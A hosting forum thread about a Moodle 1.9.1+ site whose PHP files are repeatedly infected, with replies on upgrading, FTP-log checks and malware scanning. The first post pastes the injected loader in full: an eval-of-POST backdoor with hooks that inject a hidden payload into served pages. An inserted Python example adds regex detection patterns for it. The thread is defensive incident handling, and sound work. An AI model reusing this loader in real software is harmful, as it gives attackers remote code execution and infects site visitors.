Moodle 1.9.1+ (Build: 20080528) always hacked

zooming
Forum User
Posts: 27
Joined: Tue Jan 15, 2008 9:01 am

Moodle 1.9.1+ (Build: 20080528) always hacked

Post by zooming

Hello,

I'm having problems with one customer's site that is running Moodle 1.9.1+ (Build: 20080528).

It is always hacked, the PHP files are compromised. Some code is added to the beginning of the files.

I'm having trouble convincing the customer to upgrade Moodle.

Is there a way to "virtual patch" this Moodle version through mod_security?

Thank you.
Alexandre

------
index.php head:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('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'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php // $Id: index.php,v 1.201.2.5 2008/04/15 21:42:50 stronk7 Exp $
// index.php - the front page.

///////////////////////////////////////////////////////////////////////////
// //
// NOTICE OF COPYRIGHT //
// //
// Moodle - Modular Object-Oriented Dynamic Learning Environment //
// http://moodle.org //
// //
// Copyright (C) 1999 onwards Martin Dougiamas http://moodle.com //
// //
// This program is free software; you can redistribute it and/or modify //
// it under the terms of the GNU General Public License as published by //
// the Free Software Foundation; either version 2 of the License, or //
// (at your option) any later version. //
// //
...
...
...
faris
Long Time Forum Regular
Posts: 2321
Joined: Thu Dec 09, 2004 11:19 am

Re: Moodle 1.9.1+ (Build: 20080528) always hacked

Post by faris

That's a year old! There have been all sorts of security updates for serious issues since then.

I think the real question is why does the customer stay with that version?
Is there some huge difference between that version and the latest 1.9.4.x?
And have they changed all the passwords since the last attack? Including FTP?
It is SO easy to upgrade Moodle.

Having said that, we have some customers who I need to talk to about running an older script (something else). They really need to upgrade. There's no two ways about it. I therefore understand your problem and theirs, but you have to draw the line somewhere.

In our Ts and Cs it says you HAVE to keep scripts updated with respect to security updates, "or else".

Faris.
--------------------------------
<advert>
If you want to rent a UK-based VPS that comes with friendly advice and support from a fellow ART fan, please get in touch.
</advert>
zooming
Forum User
Posts: 27
Joined: Tue Jan 15, 2008 9:01 am

Re: Moodle 1.9.1+ (Build: 20080528) always hacked

Post by zooming

Hello faris,

I agree with you. I have already drawn this line; it's the second time this customer has asked me to restore a backup because of this problem.

I'm giving him a few more days to act, but I'm also looking for other ways to mitigate the problem.

Thank you!
Alexandre
hostingguy
Forum Regular
Posts: 661
Joined: Mon Oct 29, 2007 6:51 pm

Re: Moodle 1.9.1+ (Build: 20080528) always hacked

Post by hostingguy

If he won't upgrade, then the $5 he pays you is not worth the time and cost of having your server attacked or worse.

Get rid of him and let him be someone else's problem.
mikeshinn
Atomicorp Staff - Site Admin
Posts: 4155
Joined: Thu Feb 07, 2008 7:49 pm
Location: Chantilly, VA

Re: Moodle 1.9.1+ (Build: 20080528) always hacked

Post by mikeshinn

ASL has malware-based FTP scanning, are you using that? The sigs can pick up this type of cloaked PHP malware when it's uploaded to the system.

As to the attack itself, if the PHP files themselves are being modified it's very unlikely that it's a web attack, so mod_security won't help you there. Someone is logging into the system with the user's passwords and is simply editing or uploading the files - have you checked your logs to see when the files were modified and who logged in at the same time?

Also, please send us those files so we can look into other ways to detect them (email to support@atomicorp.com; you will need to zip them up with a password or encrypt them, otherwise they won't get through). We have a redaction system in ASL that can also scrub content as it's served up by the system, so it might be possible to write a type of virtual patch, if you will, to basically defang things like this even if they do manage to get on the system somehow.
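The two checks suggested in the post above (look for the prepended loader in the PHP files, then match each file's modification time against who logged into FTP around that moment) written out as an added example. This is not code from the thread, from Moodle or from ASL: the indicator patterns are derived from the shape of the index.php head pasted at the top of the thread (request-data eval, a base64 blob in define(), a named ob_start() handler, a replaced error handler, and a PHP tag closed and reopened on line one), the infected/clean sources are constructed stand-ins with the payload and function names replaced by placeholders, and the FTP log lines are constructed in a vsftpd-style layout, which is an assumption about the log format you actually have.

```python
import re
from datetime import datetime, timedelta

# Constructed sample inputs (not taken from any real server).
# INFECTED mirrors the shape of the prepended loader pasted in the thread,
# with the base64 payload and the function names replaced by placeholders.
INFECTED = (
    "<?php if(!function_exists('tmp_xxxx')){if(isset($_POST['tmp_xxxx3']))"
    "eval($_POST['tmp_xxxx3']);if(!defined('TMP_YYYY'))"
    "define('TMP_YYYY',base64_decode('PAYLOAD_PLACEHOLDER'));"
    "function tmp_xxxx($s){return $s;}function tmp_xxxx2(){ob_start('tmp_xxxx');}}"
    "if(($a=@set_error_handler('tmp_xxxx2'))!='tmp_xxxx2')$GLOBALS['tmp_yyyy']=$a;"
    "tmp_xxxx2(); ?><?php // $Id: index.php,v 1.201.2.5 2008/04/15 21:42:50 stronk7 Exp $\n"
    "// index.php - the front page.\n"
)
CLEAN = (
    "<?php // $Id: index.php,v 1.201.2.5 2008/04/15 21:42:50 stronk7 Exp $\n"
    "// index.php - the front page.\n"
)

# Traits of the loader. Each regex is one indicator; a file is flagged only when
# two or more match, so a lone legitimate set_error_handler() call does not fire.
INDICATORS = [
    ("eval of request data", re.compile(r"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b")),
    ("base64 blob in define()", re.compile(r"define\s*\([^)]*base64_decode\s*\(")),
    ("named output-buffer hook", re.compile(r"ob_start\s*\(\s*['\"]\w+['\"]\s*\)")),
    ("error handler replaced", re.compile(r"set_error_handler\s*\(")),
    # Only meaningful on the first line: the loader closes its own tag and
    # reopens PHP right before the original file's first line.
    ("PHP tag closed and reopened on line 1", re.compile(r"\?>\s*<\?php")),
]


def scan_php(source: str) -> list[str]:
    """Return the names of the loader indicators present in a PHP source string."""
    first_line = source.split("\n", 1)[0]
    hits = []
    for name, rx in INDICATORS:
        haystack = first_line if name.startswith("PHP tag") else source
        if rx.search(haystack):
            hits.append(name)
    return hits


def is_suspicious(source: str) -> bool:
    return len(scan_php(source)) >= 2


# Constructed vsftpd-style log lines (format is an assumption; adapt LOG_RE to your daemon).
FTP_LOG = """\
Wed Jun 10 02:13:41 2009 [pid 4321] [moodleuser] OK LOGIN: Client "203.0.113.45"
Wed Jun 10 02:13:52 2009 [pid 4321] [moodleuser] OK UPLOAD: Client "203.0.113.45", "/home/moodle/public_html/index.php", 12345 bytes
Wed Jun 10 09:30:05 2009 [pid 5555] [moodleuser] OK LOGIN: Client "198.51.100.7"
"""
LOG_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ \d{2}:\d{2}:\d{2} \d{4}) \[pid \d+\] '
    r'\[(?P<user>\w+)\] (?P<status>OK|FAIL) (?P<action>\w+): Client "(?P<ip>[\d.]+)"'
)


def parse_ftp_log(text: str) -> list[dict]:
    """Parse the log lines into dicts with a real datetime under 'when'."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            e = m.groupdict()
            e["when"] = datetime.strptime(e.pop("ts"), "%a %b %d %H:%M:%S %Y")
            entries.append(e)
    return entries


def correlate(entries: list[dict], mtime: datetime,
              window: timedelta = timedelta(minutes=15)) -> list[dict]:
    """FTP events in the window leading up to (and including) the file's mtime."""
    return [e for e in entries if mtime - window <= e["when"] <= mtime]


def investigate(source: str, ftp_log_text: str, mtime: str) -> dict:
    """Combine both checks; mtime is 'YYYY-MM-DD HH:MM:SS' as os.stat would give after formatting."""
    when = datetime.strptime(mtime, "%Y-%m-%d %H:%M:%S")
    indicators = scan_php(source)
    related = correlate(parse_ftp_log(ftp_log_text), when) if len(indicators) >= 2 else []
    return {
        "indicators": indicators,
        "suspicious": len(indicators) >= 2,
        "related": [(e["action"], e["user"], e["ip"]) for e in related],
    }


if __name__ == "__main__":
    # Pretend index.php's mtime equals the upload time in the constructed log.
    result = investigate(INFECTED, FTP_LOG, "2009-06-10 02:13:52")
    print("indicators:", result["indicators"])
    for action, user, ip in result["related"]:
        print(f"  {action:6} {user}@{ip}")
```

On a real box the source would come from reading each .php file under the docroot and the mtime from os.stat; the point of the two-indicator threshold is that legitimate Moodle code does use set_error_handler() and output buffering on their own, while the combination with an eval of request data or a base64 define() on the very first line is what marks the prepended loader.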
zooming
Forum User
Posts: 27
Joined: Tue Jan 15, 2008 9:01 am

Re: Moodle 1.9.1+ (Build: 20080528) always hacked

Post by zooming

Hello Michael,

I'm not aware of this ASL feature, I'll need to read more about it.

I don't allow SSH connections, and I'll check the FTP log to see if they have a match for these files.

I don't have the modified files anymore, but I'll send them if I have this problem again.

Thank you.

Alexandre
faris
Long Time Forum Regular
Posts: 2321
Joined: Thu Dec 09, 2004 11:19 am

Re: Moodle 1.9.1+ (Build: 20080528) always hacked

Post by faris

The FTP scanning thing is still in testing though, isn't it? Not yet released?

Faris.
scott
Atomicorp Staff - Site Admin
Posts: 8355
Joined: Wed Dec 31, 1969 8:00 pm
Location: earth

Re: Moodle 1.9.1+ (Build: 20080528) always hacked

Post by scott

Yup, it's in testing; the daemon itself is fine. The hold-up is that you have to configure it by hand unless you've got ASL 2.2 on the system.
faris
Long Time Forum Regular
Posts: 2321
Joined: Thu Dec 09, 2004 11:19 am

Re: Moodle 1.9.1+ (Build: 20080528) always hacked

Post by faris

OK, thanks scott.

Zooming -- I've PMed you about something vitally important related to this. Please read ASAP.